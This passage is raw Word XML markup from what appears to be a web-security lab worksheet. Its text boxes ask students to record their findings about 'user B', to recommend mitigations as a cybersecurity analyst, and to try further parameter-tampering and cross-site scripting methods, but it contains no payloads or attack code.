                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Record your reflection here. What did you get?</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="26677A4D" w14:textId="6CC317DD" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:spacing w:line="274" w:lineRule="exact"/>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> The details of user B </w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="32221899" id="Text Box 26" o:spid="_x0000_s1032" type="#_x0000_t202" style="width:411.6pt;height:55.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KOVAAIAAOgDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9tu2zAMfR+wfxD0vjjxunYw4hRZgg4D&#10;ugvQ7gNkWbaFyaJGKbGzrx8lx1nRvRWFAYHi5YjnkF7fjr1hR4Vegy35arHkTFkJtbZtyX8+3r37&#10;yJkPwtbCgFUlPynPbzdv36wHV6gcOjC1QkYg1heDK3kXgiuyzMtO9cIvwClLwQawF4Gu2GY1ioHQ&#10;e5Ply+V1NgDWDkEq78m7n4J8k/CbRsnwvWm8CsyUnHoL6cR0VvHMNmtRtChcp+W5DfGCLnqhLT16&#10;gdqLINgB9X9QvZYIHpqwkNBn0DRaqsSB2KyWz9g8dMKpxIXE8e4ik389WPnt+AOZrkt+teLMip5m&#10;9KjGwD7ByPLrqM/gfEFpD44Sw0h+mnPi6t09yF+eWdh1wrZqiwhDp0RN/a1iZfakdMLxEaQavkJN&#10;74hDgAQ0NthH8UgORug0p9NlNrEXSc4PeX7zPqeQpNgNaXWVhpeJYq526MNnBT2LRsmRZp/QxfHe&#10;h9iNKOaU+JgHo+s7bUy6YFvtDLKjoD3Zb+OXCDxLMzYmW4hlE2L0JJqR2cQxjNU4KTqrV0F9It4I&#10;0/rR70JGB/iHs4FWr+T+90Gg4sx8saRd3NPZwNmoZkNYSaUlD5xN5i5M+3xwqNuOkKfpWNiSvo1O&#10;1OMgpi7O7dI6JUXOqx/39ek9Zf37QTd/AQAA//8DAFBLAwQUAAYACAAAACEAiYkFk9sAAAAFAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPQUvEMBCF74L/IYzgRdy0VaTUposo3gR1Vdi9ZZvZtmwzqUl2&#10;U/+9oxe9DAzv8d736uVsR3FEHwZHCvJFBgKpdWagTsH72+NlCSJETUaPjlDBFwZYNqcnta6MS/SK&#10;x1XsBIdQqLSCPsapkjK0PVodFm5CYm3nvNWRX99J43XicDvKIstupNUDcUOvJ7zvsd2vDpZ7Nyn/&#10;vNg/f5TTQ0KPTy9yvUtKnZ/Nd7cgIs7xzww/+IwODTNt3YFMEKMCHhJ/L2tlcVWA2LIpz65BNrX8&#10;T998AwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAA5oo5UAAgAA6AMAAA4AAAAAAAAAAAAA&#10;AAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAImJBZPbAAAABQEAAA8AAAAAAAAA&#10;AAAAAAAAWgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAABiBQAAAAA=&#10;" fillcolor="#dadada" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2CE697E0" w14:textId="5E455F57" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                      <w:pPr>
                        <w:spacing w:line="274" w:lineRule="exact"/>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Record your reflection here. What did you get?</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="26677A4D" w14:textId="6CC317DD" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:spacing w:line="274" w:lineRule="exact"/>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> The details of user B </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A88BE4" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:spacing w:line="253" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>As a cybersecurity analyst, what are your recommendations? Analyse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070B7FD9" w14:textId="411DAEF4" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1692"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15739392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3745A25B" wp14:editId="1214C030">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>401955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="40" name="Line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D6452DE" id="Line 25" o:spid="_x0000_s1026" style="position:absolute;z-index:157393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54.65pt,31.65pt" to="595.3pt,3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iSjygEAAIQDAAAOAAAAZHJzL2Uyb0RvYy54bWysU02PGyEMvVfqf0Dcm0miJtqOMtlD0u0l&#10;bSPt9gc4wMygAkZAMpN/X0M+tt3eqs4BYWw/Pz97Vo+jNeykQtToGj6bTDlTTqDUrmv4j5enDw+c&#10;xQROgkGnGn5WkT+u379bDb5Wc+zRSBUYgbhYD77hfUq+rqooemUhTtArR84Wg4VEZugqGWAgdGuq&#10;+XS6rAYM0gcUKkZ63V6cfF3w21aJ9L1to0rMNJy4pXKGch7yWa1XUHcBfK/FlQb8AwsL2lHRO9QW&#10;ErBj0H9BWS0CRmzTRKCtsG21UKUH6mY2fdPNcw9elV5InOjvMsX/Byu+nfaBadnwjySPA0sz2mmn&#10;2HyRtRl8rClk4/YhdydG9+x3KH5G5nDTg+tU4fhy9pQ3yxnVHynZiJ4qHIavKCkGjgmLUGMbbIYk&#10;CdhY5nG+z0ONiQl6XD4sl/PFgjNx81VQ3xJ9iOmLQsvypeGGSBdgOO1iykSgvoXkOg6ftDFl3Max&#10;oeGfFtRi9kQ0WmZnMUJ32JjATpAXpnylqzdhGXkLsb/EFYTLKgU8Olmq9Ark5+s9gTaXO7Ey7qpS&#10;FuYi8QHleR9u6tGoC/3rWuZd+t0u2a8/z/oXAAAA//8DAFBLAwQUAAYACAAAACEAdiUWjd0AAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU/DMAyF70j8h8hIXCaWbJUqVppOCOiNCxuIq9eatqJx&#10;uibbCr8eTxzgZD376fl7+XpyvTrSGDrPFhZzA4q48nXHjYXXbXlzCypE5Bp7z2ThiwKsi8uLHLPa&#10;n/iFjpvYKAnhkKGFNsYh0zpULTkMcz8Qy+3Djw6jyLHR9YgnCXe9XhqTaocdy4cWB3poqfrcHJyF&#10;UL7RvvyeVTPznjSelvvH5ye09vpqur8DFWmKf2Y44ws6FMK08weug+pFm1UiVgtpIvNsWKxMCmr3&#10;u9FFrv9XKH4AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAiUIko8oBAACEAwAADgAAAAAA&#10;AAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAdiUWjd0AAAAKAQAADwAA&#10;AAAAAAAAAAAAAAAkBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAC4FAAAAAA==&#10;">
                <w10:wrap anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:t>document your suggestions to mit</w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:t>igate this vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F346F63" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A214B5" w14:textId="2E5385D2" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15740416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05724B5D" wp14:editId="0D2A6439">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="39" name="Line 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A125B03" id="Line 24" o:spid="_x0000_s1026" style="position:absolute;z-index:157404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8I5tzQEAAIQDAAAOAAAAZHJzL2Uyb0RvYy54bWysU01v2zAMvQ/YfxB0X5y4S9AacXpI1l2y&#10;LUC7H8BIsi1UFgVJiZ1/P0r5aLfdhvkgiCL5+PhILx/H3rCj8kGjrflsMuVMWYFS27bmP1+ePt1z&#10;FiJYCQatqvlJBf64+vhhObhKldihkcozArGhGlzNuxhdVRRBdKqHMEGnLDkb9D1EMn1bSA8Dofem&#10;KKfTRTGgl86jUCHQ6+bs5KuM3zRKxB9NE1RkpubELebT53OfzmK1hKr14DotLjTgH1j0oC0VvUFt&#10;IAI7eP0XVK+Fx4BNnAjsC2waLVTugbqZTf/o5rkDp3IvJE5wN5nC/4MV3487z7Ss+d0DZxZ6mtFW&#10;W8XKz0mbwYWKQtZ251N3YrTPboviNTCL6w5sqzLHl5OjvFnKKH5LSUZwVGE/fENJMXCImIUaG98n&#10;SJKAjXkep9s81BiZoMfF/WJRzueciauvgOqa6HyIXxX2LF1qboh0BobjNsREBKprSKpj8Ukbk8dt&#10;LBtq/jAv5zkhoNEyOVNY8O1+bTw7QlqY/OWuyPM+LCFvIHTnuOw6r5LHg5W5SqdAfrncI2hzvhMr&#10;Yy8qJWHOEu9Rnnb+qh6NOtO/rGXapfd2zn77eVa/AAAA//8DAFBLAwQUAAYACAAAACEArwkjpd8A&#10;AAAOAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU/DMAyF70j8h8hIXKYt6SomWppOCOiNCwO0a9aY&#10;tqJxuibbCr8e74Dg5mc/PX+vWE+uF0ccQ+dJQ7JQIJBqbztqNLy9VvNbECEasqb3hBq+MMC6vLwo&#10;TG79iV7wuImN4BAKudHQxjjkUoa6RWfCwg9IfPvwozOR5dhIO5oTh7teLpVaSWc64g+tGfChxfpz&#10;c3AaQvWO++p7Vs/UNm08LvePz09G6+ur6f4ORMQp/pnhjM/oUDLTzh/IBtGzVlnKVh5u0iQDcbYk&#10;mVqB2P3uZFnI/zXKHwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAAL&#10;AAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBD8I5tzQEAAIQDAAAO&#10;AAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCvCSOl3wAAAA4B&#10;AAAPAAAAAAAAAAAAAAAAACcEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAMwUAAAAA&#10;">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A016B99" w14:textId="516254A1" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1663"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CC1DB25" wp14:editId="29237C3F">
                <wp:extent cx="5227320" cy="8237220"/>
                <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
                <wp:docPr id="38"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27320" cy="8237220"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DADAD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26D6AEC" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                            <w:pPr>
                              <w:ind w:left="28" w:right="26"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Additionally, try other methods for parameter tampering and Cross-site scripting</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-7"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>attacks.</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-5"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Record</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>your</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-5"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>reflection</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-6"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>here</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-4"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>on</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-6"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>the</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-4"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>other</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-5"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>methods</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-5"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>and your analyse (Question v on task</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>2)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0CC1DB25" id="Text Box 23" o:spid="_x0000_s1033" type="#_x0000_t202" style="width:411.6pt;height:648.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SGTAAIAAOkDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9uO0zAQfUfiHyy/07Spll1FTVel1SKk&#10;5SLt8gGO4yQWjseM3Sbl6xk7TVngDaFI1ngux3POTDb3Y2/YSaHXYEu+Wiw5U1ZCrW1b8q/PD2/u&#10;OPNB2FoYsKrkZ+X5/fb1q83gCpVDB6ZWyAjE+mJwJe9CcEWWedmpXvgFOGUp2AD2ItAV26xGMRB6&#10;b7J8uXybDYC1Q5DKe/IepiDfJvymUTJ8bhqvAjMlp95COjGdVTyz7UYULQrXaXlpQ/xDF73Qlh69&#10;Qh1EEOyI+i+oXksED01YSOgzaBotVeJAbFbLP9g8dcKpxIXE8e4qk/9/sPLT6QsyXZd8TZOyoqcZ&#10;PasxsHcwsnwd9RmcLyjtyVFiGMlPc05cvXsE+c0zC/tO2FbtEGHolKipv1WszF6UTjg+glTDR6jp&#10;HXEMkIDGBvsoHsnBCJ3mdL7OJvYiyXmT57frnEKSYnf5+janS3xDFHO5Qx/eK+hZNEqONPwEL06P&#10;Pkypc0p8zYPR9YM2Jl2wrfYG2UnQohx28bug/5ZmbEy2EMsmxOhJPCO1iWQYqzFJejPLV0F9JuII&#10;0/7R/0JGB/iDs4F2r+T++1Gg4sx8sCReXNTZwNmoZkNYSaUlD5xN5j5MC310qNuOkKfxWNiRwI1O&#10;1OMkpi4u7dI+JfEuux8X9uU9Zf36Q7c/AQAA//8DAFBLAwQUAAYACAAAACEAHKDl1NwAAAAGAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBCF74L/YRnBi7SbrqAxZlNE8SZoqwW9bbPTJDQ7G3e3&#10;Tfz3jl70MjC8x3vfK5eT68URQ+w8aVjMMxBItbcdNRreXh9nOYiYDFnTe0INXxhhWZ2elKawfqQV&#10;HtepERxCsTAa2pSGQspYt+hMnPsBibWdD84kfkMjbTAjh7teqiy7ks50xA2tGfC+xXq/Pjju/RgX&#10;nxf7500+PIwY8OlFvu9Grc/PprtbEAmn9GeGH3xGh4qZtv5ANopeAw9Jv5e1XF0qEFs2qZtrBbIq&#10;5X/86hsAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDuLSGTAAIAAOkDAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAcoOXU3AAAAAYBAAAPAAAAAAAA&#10;AAAAAAAAAFoEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAYwUAAAAA&#10;" fillcolor="#dadada" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="026D6AEC" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                      <w:pPr>
                        <w:ind w:left="28" w:right="26"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Additionally, try other methods for parameter tampering and Cross-site scripting</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-7"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>attacks.</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-5"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Record</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>your</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-5"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>reflection</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-6"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>here</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-4"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>on</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-6"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>the</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-4"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>other</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-5"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>methods</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-5"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>and your analyse (Question v on task</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>2)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0389B290" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5493F9F4" w14:textId="5C848831" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="82"/>
        <w:ind w:left="4980"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15741440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30F65EDE" wp14:editId="5739B93F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
